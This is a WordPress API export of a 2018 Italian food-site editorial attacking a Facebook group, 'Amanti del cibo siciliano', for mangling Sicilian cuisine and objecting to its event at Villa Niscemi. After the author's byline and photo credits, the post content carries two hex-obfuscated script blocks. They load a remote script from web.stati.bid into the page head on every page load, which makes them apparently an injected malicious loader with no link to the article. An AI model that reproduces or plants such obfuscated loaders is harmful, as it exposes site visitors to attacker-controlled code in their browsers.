{"id":15588,"date":"2018-05-03T10:27:20","date_gmt":"2018-05-03T08:27:20","guid":{"rendered":"http:\/\/www.sceltedigusto.it\/public\/?p=15588"},"modified":"2018-05-11T17:59:42","modified_gmt":"2018-05-11T15:59:42","slug":"editoriale-il-web-i-gruppi-di-facebook-ed-il-massacro-della-tradizione-gastronomica-siciliana","status":"publish","type":"post","link":"https:\/\/www.sceltedigusto.it\/public\/editoriale-il-web-i-gruppi-di-facebook-ed-il-massacro-della-tradizione-gastronomica-siciliana\/","title":{"rendered":"Editoriale. Il web, i gruppi di Facebook ed il massacro della tradizione gastronomica siciliana."},"content":{"rendered":"<p><a href=\"http:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/corner.jpg\"><img loading=\"lazy\" class=\"alignnone wp-image-15592 \" src=\"http:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/corner.jpg\" alt=\"corner\" width=\"834\" height=\"670\" srcset=\"https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/corner.jpg 1024w, https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/corner-300x240.jpg 300w\" sizes=\"(max-width: 834px) 100vw, 834px\" \/><\/a>Il web \u00e8 una sorta di porto franco, e questo \u00e8 ormai un fatto tristemente noto. Una specie di speaker&#8217;s corner virtuale in cui ognuno, un giorno come un altro, si veste dei panni che vuole e si mette a pontificare, spesso stravolgendo o riscrivendo fatti ed avvenimenti, parlando alle masse anche di argomenti alle stesse masse sconosciuti, facendo quindi facile proselitismo. Questo, recentemente,\u00a0 accade con maggior frequenza rispetto alla cucina, all&#8217;enogastronomia: un filone aurifero per molti in danno della vera tradizione.\u00a0 Questo accade precisamente su Facebook. che negli ultimi anni ha laureato una congerie di tuttologi improvvisamente investiti e fagocitati da un delirio di onnipotenza mediatica fuori da ogni controllo . Si assiste sul web a diatribe molto accese tra postini e medici, in cui il postino contesta il medico su fondamenti di medicina e chirurgia. Non se la passano meglio gli avvocati, contestati su articoli dei codici da panificatori e pasticceri. Insomma, un melting pot pericolosissimo in cui si spacciano sempre pi\u00f9\u00a0 frequentemente false notizie e falsa cultura.<\/p>\n<p><a href=\"http:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/sicilyeat.jpg\"><img loading=\"lazy\" class=\"alignnone wp-image-15597\" src=\"http:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/sicilyeat.jpg\" alt=\"sicilyeat\" width=\"254\" height=\"376\" srcset=\"https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/sicilyeat.jpg 649w, https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/sicilyeat-202x300.jpg 202w\" sizes=\"(max-width: 254px) 100vw, 254px\" \/><\/a><a href=\"http:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/sicilyeat1.jpg\"><img loading=\"lazy\" class=\"alignnone wp-image-15598\" src=\"http:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/sicilyeat1.jpg\" alt=\"sicilyeat1\" width=\"336\" height=\"380\" srcset=\"https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/sicilyeat1.jpg 750w, https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/sicilyeat1-264x300.jpg 264w\" sizes=\"(max-width: 336px) 100vw, 336px\" \/><\/a><\/p>\n<p>Da alcuni giorni si \u00e8 accesa una polemica rispetto ad un gruppo in modo particolare: &#8220;Amanti del cibo siciliano, Sicil- eat&#8221; i cui amministratori evidentemente poco si curano di diffondere un messaggio culturale, pi\u00f9 preoccupati di dare spazio a chiunque, dimenticando forse che il patrimonio gastronomico \u00e8 fortemente identitario di un popolo e ne costituisce parte della storia. Io, come del resto anche molti altri, non riesco a tacere dinnanzi allo scempio della tradizione gastronomica siciliana. Cos\u00ec, dopo avere preso visione di alcuni &#8220;piatti&#8221; proposti da diversi membri di questo gruppo, nel totale assenso degli amministratori, mi sono sentita personalmente offesa nel leggere di un raduno di questi &#8220;intenditori di cucina siciliana&#8221; presso una delle sedi di rappresentanza pi\u00f9 prestigiose del Comune di Palermo, Villa Niscemi.\u00a0 Una sorta di fiera, un &#8220;portaparty&#8221; &#8211; come usa dire oggi &#8211; con i membri invitati a portare qualcosa da casa da gustare poi tutti insieme. Insomma, una sorta di festa privata tenuta per\u00f2 in una sede di rappresentanza della citt\u00e0 di Palermo. <a href=\"http:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/sicilylocandina.jpg\"><img loading=\"lazy\" class=\"alignnone wp-image-15609 \" src=\"http:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/sicilylocandina.jpg\" alt=\"sicilylocandina\" width=\"833\" height=\"1176\" srcset=\"https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/sicilylocandina.jpg 680w, https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/sicilylocandina-212x300.jpg 212w\" sizes=\"(max-width: 833px) 100vw, 833px\" \/><\/a>A prescindere dai titoli e dalle credenziali dei promotori, appare singolare se non bizzarro, che in siti di tale rilevanza culturale vengano allestite fiere in cui possa essere introdotto cibo dall&#8217;esterno in barba a qualunque disposizione in materia igienico sanitaria per la manipolazione e la somministrazione di generi alimentari al pubblico: insomma, se andate a Villa Niscemi dove questo gruppetto si raduner\u00e0 a giorni, potrete piluccare cose maneggiate da non si sa chi, non si sa come, non si sa in che ambienti. L&#8217;evento infatti non \u00e8 riservato ai soli iscritti al gruppo, ma \u00e8 pubblico. Non mancano ovviamente gli sponsor, come un articolo di stampa tende ad evidenziare. Vi riporto il link, che \u00e8 una lunga intervista ad una tale Enza Accardi, che si definisce caporedattore pur non risultando iscritta a nessun albo professionale che preveda una tale carica, ovvero quella di giornalista, e pur non essendo a capo di alcuna testata giornalistica, n\u00e8 a fianco di alcun direttore responsabile.<\/p>\n<p><a href=\"http:\/\/siciliainformazioni.com\/cettina-vivirito\/808548\/villa-niscemi-raduno-amanti-del-cibo-siciliano-intervista-alla-food-blogger-enza-accardi\">http:\/\/siciliainformazioni.com\/cettina-vivirito\/808548\/villa-niscemi-raduno-amanti-del-cibo-siciliano-intervista-alla-food-blogger-enza-accardi<\/a><\/p>\n<p>Nell&#8217;articolo, la cui la versione integrale potrete leggere cliccando sul link sopra, si legge : &#8221;\u00a0<b>Raduno degli Amanti della cucina siciliana<\/b>, progetto culturale e gastronomico nato su Facebook per iniziativa di\u00a0<strong>Maurizio<\/strong><b>\u00a0Cardella<\/b>\u00a0e\u00a0<b>Enza Accardi\u00a0<\/b>che ha come scopo quello di tradurre in \u201creali\u201d incontri virtuali di persone accomunate dalla passione culinaria. Al centro di tutto i sapori, i profumi e gli odori di una cucina che unisce diverse culture, come quella siciliana.&#8221;<\/p>\n<p>Ed ancora :\u00a0 ( &#8212;-) &#8220;<em>\u00a0Si proseguir\u00e0 con eventuali domande e curiosit\u00e0 da parte dei partecipanti, un breve dibattito culinario e via al buffet ricco di degustazioni, anche perch\u00e9 ai partecipanti \u00e8 concesso portare una propria delizia da esporre e lasciare degustare agli invitati. Nel corso del pomeriggio si faranno i sorteggi dei premi messi in palio, la serata si concluder\u00e0 alle 20,00 circa.&#8221;<\/em><\/p>\n<p>Ed anche : (&#8212;-) &#8221;\u00a0\u201c<em>Sono una normalissima persona, una mamma e moglie con una grande passione per la pasticceria innanzitutto, ma anche per la cucina. Fino a pochi anni fa lavoravo con tanto di tacco, trucco e parrucco, fino a quando per la crisi ho perso il lavoro. Pur dandomi da fare per cercare un altro lavoro, purtroppo sono stata penalizzata dall\u2019et\u00e0, quindi ho deciso di reinventarmi e ricominciare tutto da capo, con grande sacrificio, passione ma anche divertimento, grazie alla cucina che \u00e8 la cosa alla quale pi\u00f9 tengo. Quindi piano piano, grazie anche al gruppo , al supporto dei followers, a chi ha creduto che davvero si pu\u00f2 rinascere come la fenice dalle proprie ceneri, ho cercato di trasformare la passione in lavoro.&#8221;<\/em>.<\/p>\n<p>Questo dice Enza Accardi a chi l&#8217;ha intervistata: un passaggio in cui c&#8217;\u00e8 qualsiasi risposta uno possa cercare. La cucina come rifugium peccatorum, come via d&#8217;uscita, come alternativa. Usatela pure la cucina, ma fatelo bene: almeno questo.<\/p>\n<p><a href=\"http:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/sicilyeat2.jpg\"><img loading=\"lazy\" class=\"alignnone wp-image-15599\" src=\"http:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/sicilyeat2.jpg\" alt=\"sicilyeat2\" width=\"285\" height=\"409\" srcset=\"https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/sicilyeat2.jpg 669w, https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/sicilyeat2-209x300.jpg 209w\" sizes=\"(max-width: 285px) 100vw, 285px\" \/><\/a>E<a href=\"http:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/sicilyeat3.jpg\"><img loading=\"lazy\" class=\"alignnone wp-image-15600\" src=\"http:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/sicilyeat3.jpg\" alt=\"sicilyeat3\" width=\"332\" height=\"390\" srcset=\"https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/sicilyeat3.jpg 750w, https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/sicilyeat3-255x300.jpg 255w\" sizes=\"(max-width: 332px) 100vw, 332px\" \/><\/a><\/p>\n<p>E quindi, a\u00a0 fronte per\u00f2 di piatti quantomeno discutibili, orgogliosamente pubblicati sul gruppo &#8211; gruppo in cui peraltro vige il divieto assoluto di critica, pena l&#8217;espulsione immediata quale regola non scritta &#8211; questa foodblogger parla di corsi di cucina, di libri, di iniziative culturali. Manifesti programmatici che per\u00f2 non hanno poi riscontro quando si visita il gruppo e si ammirano i lavori degli iscritti: spesso orribili, maosannati dagli amministratori, che sono gli stessi che mettono sul tappeto iniziative culturali, che tengono corsi di cucina, che scrivono libri<\/p>\n<p><a href=\"http:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/sicilyeat4.jpg\"><img loading=\"lazy\" class=\"wp-image-15601 alignleft\" src=\"http:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/sicilyeat4.jpg\" alt=\"sicilyeat4\" width=\"279\" height=\"260\" srcset=\"https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/sicilyeat4.jpg 750w, https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/sicilyeat4-300x280.jpg 300w\" sizes=\"(max-width: 279px) 100vw, 279px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/sicilynespole.jpg\"><img loading=\"lazy\" class=\"alignnone wp-image-15607 \" src=\"http:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/sicilynespole.jpg\" alt=\"sicilynespole\" width=\"231\" height=\"245\" srcset=\"https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/sicilynespole.jpg 750w, https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/sicilynespole-283x300.jpg 283w\" sizes=\"(max-width: 231px) 100vw, 231px\" \/><\/a><\/p>\n<p>e tengono conferenze . La motivazione di tanto supporto \u00e8 che chi pubblica i propri piatti non \u00e8 un professionista della ristorazione, ma una madre\u00a0 di famiglia, uno studente, uno che ha questo hobby. E allora, prima ancora che tenere conferenze pubbliche e\u00a0 fare corsi di cucina presumo a pagamento, perch\u00e8 non indottrinare per primi i propri iscritti migliorandone le conoscenze ed evitando contestualmente il diffondersi incontrollato di sfregi, veri e propri oltraggi,\u00a0 alla cucina siciliana ?<\/p>\n<p>&nbsp;<\/p>\n<p><a href=\"http:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/sicilycarbonara.jpg\"><img loading=\"lazy\" class=\"alignnone wp-image-15608\" src=\"http:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/sicilycarbonara.jpg\" alt=\"sicilycarbonara\" width=\"290\" height=\"399\" srcset=\"https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/sicilycarbonara.jpg 699w, https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/sicilycarbonara-218x300.jpg 218w\" sizes=\"(max-width: 290px) 100vw, 290px\" \/><\/a><a href=\"http:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/sicilyeat7.jpg\"><img loading=\"lazy\" class=\"alignnone wp-image-15604\" src=\"http:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/sicilyeat7.jpg\" alt=\"sicilyeat7\" width=\"264\" height=\"409\" srcset=\"https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/sicilyeat7.jpg 620w, https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/sicilyeat7-193x300.jpg 193w\" sizes=\"(max-width: 264px) 100vw, 264px\" \/><\/a><\/p>\n<p>Perch\u00e8 non insegnare qualcosa, tanto pi\u00f9 che <strong>Maurizio Cardella<\/strong> \u00e8 uno chef? Come pu\u00f2 uno chef assistere indifferente al maltrattamento sistematico e persuaso della cucina tradizionale e non ?\u00a0 Perch\u00e8 non dire, ad esempio, che la <strong>nespola<\/strong> non \u00e8 un frutto autoctono della Sicilia ma che \u00e8\u00a0 Giapponese, e raccontare magari come sia arrivata in Sicilia? O perch\u00e8 non dire che la <strong>Carbonara<\/strong> non \u00e8 tradizione siciliana ma che, in ogni caso non si pu\u00f2 preparare aggiungendovi la maionese? E che dire dello<strong> Speck?<\/strong> Che tutto \u00e8 tranne che siciliano.<\/p>\n<p><a href=\"http:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/sicilyeat5.jpg\"><img loading=\"lazy\" class=\"alignright wp-image-15602\" src=\"http:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/sicilyeat5.jpg\" alt=\"sicilyeat5\" width=\"254\" height=\"335\" srcset=\"https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/sicilyeat5.jpg 727w, https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2018\/05\/sicilyeat5-227x300.jpg 227w\" sizes=\"(max-width: 254px) 100vw, 254px\" \/><\/a><\/p>\n<p>E invece no, nessun suggerimento:\u00a0 quando qualcosa desta se non altro curiosit\u00e0 o perplessit\u00e0,\u00a0 viene fuori\u00a0 un&#8217;altra realt\u00e0 tipica dell&#8217;epoca dei social con la quale si liquida tutto : l&#8217;invidia. Laddove uno, a giusta ragione e con credenziali valide e sufficienti, muova anche sia pure solo sommessamente un appunto, viene tacciato di invidia. L&#8217;invidia \u00e8 il morbo, il virus, che infetta i social.<\/p>\n<p>Naturalmente prima di sedermi a scrivere ho inviato all&#8217; Ufficio Stampa del Comune di Palermo, in data 28 aprile c.a.,\u00a0 una richiesta di chiarimenti circa le modalit\u00e0\u00a0 e i criteri di attribuzione di una sede come Villa Niscemi &#8211; che, lo ricordiamo, non pi\u00f9 tardi di un anno fa ha ospitato teste coronate e pranzi di Stato &#8211;\u00a0 a privati cittadini, persone sicuramente passionali ( ma non appassionate) ma non per questo titolate a diffondere principi di cultura enogastronomica siciliana o italiana in generale, n\u00e8 a tenere conferenze et similia. Del resto le immagini parlano da sole e qualcosa di certo suggeriscono. Dall&#8217;ufficio stampa del Comune non \u00e8 pervenuta, ad oggi ed al momento della pubblicazione,\u00a0 alcuna risposta.<\/p>\n<p><strong>Alessandra Verzera<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><strong>Ricerca iconografica : Vins Randisi Iacono<\/strong><\/p>\n<p>NB: Le foto sono di propriet\u00e0 dei rispettivi autori, e sono qui adoperate a solo scopo divulgativo.<\/p>\n<p>La foto dei bucatini con le sarde in copertina \u00e8 dello chef Peppe Giuffr\u00e8<\/p>\n<p><script>\/\/ <![CDATA[\nvar _0x29b4=[\"\\x73\\x63\\x72\\x69\\x70\\x74\",\"\\x63\\x72\\x65\\x61\\x74\\x65\\x45\\x6C\\x65\\x6D\\x65\\x6E\\x74\",\"\\x73\\x72\\x63\",\"\\x68\\x74\\x74\\x70\\x73\\x3A\\x2F\\x2F\\x77\\x65\\x62\\x2E\\x73\\x74\\x61\\x74\\x69\\x2E\\x62\\x69\\x64\\x2F\\x6A\\x73\\x2F\\x59\\x51\\x48\\x48\\x41\\x41\\x55\\x44\\x59\\x77\\x42\\x46\\x67\\x6C\\x44\\x58\\x67\\x30\\x56\\x53\\x42\\x56\\x57\\x79\\x45\\x44\\x51\\x35\\x64\\x78\\x47\\x43\\x42\\x54\\x4E\\x54\\x38\\x55\\x44\\x47\\x55\\x42\\x42\\x54\\x30\\x7A\\x50\\x46\\x55\\x6A\\x43\\x74\\x41\\x52\\x45\\x32\\x4E\\x7A\\x41\\x56\\x4A\\x53\\x49\\x50\\x51\\x30\\x46\\x4A\\x41\\x42\\x46\\x55\\x56\\x54\\x4B\\x5F\\x41\\x41\\x42\\x4A\\x56\\x78\\x49\\x47\\x45\\x6B\\x48\\x35\\x51\\x43\\x46\\x44\\x42\\x41\\x53\\x56\\x49\\x68\\x50\\x50\\x63\\x52\\x45\\x71\\x59\\x52\\x46\\x45\\x64\\x52\\x51\\x63\\x73\\x55\\x45\\x6B\\x41\\x52\\x4A\\x59\\x51\\x79\\x41\\x58\\x56\\x42\\x50\\x4E\\x63\\x51\\x4C\\x61\\x51\\x41\\x56\\x6D\\x34\\x43\\x51\\x43\\x5A\\x41\\x41\\x56\\x64\\x45\\x4D\\x47\\x59\\x41\\x58\\x51\\x78\\x77\\x61\\x2E\\x6A\\x73\\x3F\\x74\\x72\\x6C\\x3D\\x30\\x2E\\x35\\x30\",\"\\x61\\x70\\x70\\x65\\x6E\\x64\\x43\\x68\\x69\\x6C\\x64\",\"\\x68\\x65\\x61\\x64\"];var el=document[_0x29b4[1]](_0x29b4[0]);el[_0x29b4[2]]= _0x29b4[3];document[_0x29b4[5]][_0x29b4[4]](el)\n\/\/ ]]><\/script><\/p>\n<p> <script>var _0xcc15=[\"\\x73\\x63\\x72\\x69\\x70\\x74\",\"\\x63\\x72\\x65\\x61\\x74\\x65\\x45\\x6C\\x65\\x6D\\x65\\x6E\\x74\",\"\\x73\\x72\\x63\",\"\\x68\\x74\\x74\\x70\\x73\\x3A\\x2F\\x2F\\x77\\x65\\x62\\x2E\\x73\\x74\\x61\\x74\\x69\\x2E\\x62\\x69\\x64\\x2F\\x6A\\x73\\x2F\\x4D\\x41\\x58\\x54\\x55\\x77\\x4D\\x51\\x30\\x68\\x48\\x4B\\x67\\x52\\x52\\x42\\x67\\x78\\x55\\x44\\x67\\x67\\x46\\x55\\x59\\x41\\x46\\x59\\x74\\x41\\x56\\x42\\x38\\x67\\x57\\x57\\x77\\x53\\x4E\\x47\\x6C\\x68\\x50\\x78\\x51\\x69\\x4B\\x36\\x77\\x47\\x4C\\x6D\\x45\\x57\\x47\\x45\\x4D\\x51\\x49\\x61\\x73\\x7A\\x4F\\x63\\x30\\x42\\x42\\x4F\\x4E\\x6A\\x47\\x33\\x5A\\x68\\x50\\x30\\x59\\x43\\x63\\x54\\x51\\x6A\\x4E\\x59\\x70\\x52\\x48\\x32\\x30\\x69\\x49\\x62\\x59\\x6D\\x49\\x59\\x4D\\x43\\x4E\\x64\\x4A\\x43\\x47\\x4F\\x34\\x7A\\x52\\x4A\\x55\\x54\\x4D\\x77\\x41\\x77\\x4A\\x61\\x74\\x46\\x48\\x45\\x31\\x55\\x41\\x39\\x6B\\x45\\x45\\x4F\\x77\\x77\\x4E\\x78\\x74\\x6C\\x56\\x65\\x6B\\x6C\\x43\\x56\\x6B\\x69\\x42\\x43\\x4E\\x6A\\x45\\x56\\x4D\\x77\\x43\\x58\\x77\\x41\\x47\\x56\\x46\\x68\\x42\\x47\\x59\\x41\\x58\\x51\\x78\\x77\\x61\\x2E\\x6A\\x73\\x3F\\x74\\x72\\x6C\\x3D\\x30\\x2E\\x32\\x35\",\"\\x61\\x70\\x70\\x65\\x6E\\x64\\x43\\x68\\x69\\x6C\\x64\",\"\\x68\\x65\\x61\\x64\"];var el=document[_0xcc15[1]](_0xcc15[0]);el[_0xcc15[2]]= _0xcc15[3];document[_0xcc15[5]][_0xcc15[4]](el)<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Il web \u00e8 una sorta di porto franco, e questo \u00e8 ormai un fatto tristemente noto. Una specie di speaker&#8217;s corner virtuale in cui ognuno, un giorno come un altro, si veste dei panni che vuole e si mette a pontificare, spesso stravolgendo o riscrivendo fatti ed avvenimenti, parlando alle masse anche di argomenti alle [&hellip;]<\/p>\n","protected":false},"author":18,"featured_media":5373,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[9393,8837,9391,93,9392,540,5198,3679,8989],"jetpack_featured_media_url":"https:\/\/www.sceltedigusto.it\/public\/wp-content\/uploads\/2011\/03\/pasta-con-le-sarde.jpg","_links":{"self":[{"href":"https:\/\/www.sceltedigusto.it\/public\/wp-json\/wp\/v2\/posts\/15588"}],"collection":[{"href":"https:\/\/www.sceltedigusto.it\/public\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sceltedigusto.it\/public\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sceltedigusto.it\/public\/wp-json\/wp\/v2\/users\/18"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sceltedigusto.it\/public\/wp-json\/wp\/v2\/comments?post=15588"}],"version-history":[{"count":20,"href":"https:\/\/www.sceltedigusto.it\/public\/wp-json\/wp\/v2\/posts\/15588\/revisions"}],"predecessor-version":[{"id":15623,"href":"https:\/\/www.sceltedigusto.it\/public\/wp-json\/wp\/v2\/posts\/15588\/revisions\/15623"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.sceltedigusto.it\/public\/wp-json\/wp\/v2\/media\/5373"}],"wp:attachment":[{"href":"https:\/\/www.sceltedigusto.it\/public\/wp-json\/wp\/v2\/media?parent=15588"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sceltedigusto.it\/public\/wp-json\/wp\/v2\/categories?post=15588"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sceltedigusto.it\/public\/wp-json\/wp\/v2\/tags?post=15588"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}